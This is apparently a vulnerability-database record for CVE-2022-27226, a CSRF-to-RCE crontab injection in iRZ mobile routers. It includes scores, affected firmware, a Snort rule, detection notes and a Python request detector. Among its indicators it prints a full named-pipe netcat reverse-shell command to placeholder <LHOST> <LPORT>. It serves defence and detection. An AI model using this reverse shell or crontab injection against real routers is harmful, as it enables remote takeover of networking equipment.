CVE-2022-27226
published 2022-03-19


Priority: P1 · 86 · high · 8.8 (CVSS 3.1)
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:R / S:U / C:H / I:H / A:H
Exploited in the wild (ITW); listed in VulnCheck KEV
EPSS: 34.53% (98.2th percentile)
A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.

Affected

5 ranges
Vendor   Product          Version range    Fixed in
irz      rl01_firmware    <= 2022-03-16
irz      rl21_firmware    <= 2022-03-16
irz      ru21_firmware    <= 2022-03-16
irz      ru21w_firmware   <= 2022-03-16
irz      ru41_firmware    <= 2022-03-16

Detection & IOCs (extracted from sources)

url: /api/crontab
command: rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f
snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT iRZ Mobile Router RCE Inbound M1 (CVE-2022-27226)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/crontab"; fast_pattern; http.request_body; content:"|22|tasks|22 3a|"; content:"|22|command|22 3a|"; reference:cve,2022-27226; classtype:attempted-admin; sid:2035954; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_04_14, cve CVE_2022_27226, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, updated_at 2024_03_08;)
bytes: |22|tasks|22 3a|
bytes: |22|command|22 3a|
  • Detect POST requests to /api/crontab on iRZ router admin panels; the JSON body contains 'tasks' and 'command' keys, indicating crontab injection for RCE.
  • The exploit sets the HTTP header X-Requested-With: XMLHttpRequest alongside Origin and Referer headers matching the router URL; these headers in a POST to /api/crontab are a strong signal of exploitation.
  • Monitor for creation or use of the named pipe /tmp/f on router filesystems, a hallmark of the mkfifo-style reverse shell payload used in this exploit.
  • Exposed iRZ router admin panels can be found with a Google dork; monitor for external reconnaissance against devices with this title.
  • Affected hardware models include RU21, RU21w, RL21, RU41 and RL01; prioritize detection and patching on these iRZ router models.
  • The exploit works both with and without credentials. Without credentials it relies on CSRF (the victim must visit a malicious page); with valid or default credentials it achieves RCE directly, with no user interaction required.
  • The crontab payload executes on the attacker-defined schedule (wildcard '*' for all time fields), so the shell callback may be delayed up to ~2 minutes after the malicious POST is sent.
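As an added example (not part of this record, the Snort rule, or any vendor code), the following Python applies the rule's core conditions (POST, /api/crontab, the two body byte patterns) plus the header heuristics from the notes above to a constructed request, and extracts the scheduled commands for triage. The request parser, signal names and the 192.0.2.1 sample address are assumptions made for the example.

```python
import json
from urllib.parse import urlparse

# Byte patterns from the Snort rule: |22|tasks|22 3a| and |22|command|22 3a|
TASKS_PATTERN = b'"tasks":'
COMMAND_PATTERN = b'"command":'

def parse_request(raw: bytes):
    """Minimal HTTP/1.1 request splitter (a proxy or IDS log would feed real deployments)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _ = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return method.decode(), target.decode().split("?")[0], headers, body

def assess(raw: bytes) -> dict:
    """Flag a request that looks like CVE-2022-27226 crontab injection."""
    method, path, headers, body = parse_request(raw)
    result = {"match": False, "signals": [], "commands": []}
    if method != "POST" or path != "/api/crontab":
        return result                                   # rule preconditions not met
    if TASKS_PATTERN in body and COMMAND_PATTERN in body:
        result["signals"].append("crontab_json_body")   # core Snort condition
    if headers.get("x-requested-with") == "XMLHttpRequest":
        result["signals"].append("xhr_header")          # header the exploit sets
    if urlparse(headers.get("origin", "")).netloc == headers.get("host"):
        result["signals"].append("origin_matches_host") # Origin forged to router URL
    try:                                                # scheduled commands, for triage
        tasks = json.loads(body).get("tasks", [])
        result["commands"] = [t["command"] for t in tasks
                              if isinstance(t, dict) and "command" in t]
    except (ValueError, AttributeError, TypeError):
        pass                                            # not JSON; byte match still counts
    result["match"] = "crontab_json_body" in result["signals"]
    return result

# Constructed sample (not captured traffic); 192.0.2.1 is a documentation address.
SAMPLE_REQUEST = (
    b"POST /api/crontab HTTP/1.1\r\n"
    b"Host: 192.0.2.1\r\n"
    b"X-Requested-With: XMLHttpRequest\r\n"
    b"Origin: http://192.0.2.1\r\n"
    b"Referer: http://192.0.2.1/\r\n"
    b"Content-Type: application/json\r\n\r\n"
    b'{"tasks":[{"time":"* * * * *","command":"echo probe > /tmp/x"}]}'
)
BENIGN_REQUEST = b"GET /api/status HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
```

Any extracted command can then be checked against the /tmp/f named-pipe indicator listed above before escalating the alert.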

CVSS provenance

nvd v3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvd v2.0: 9.3 CRITICAL, AV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck: 8.8 HIGH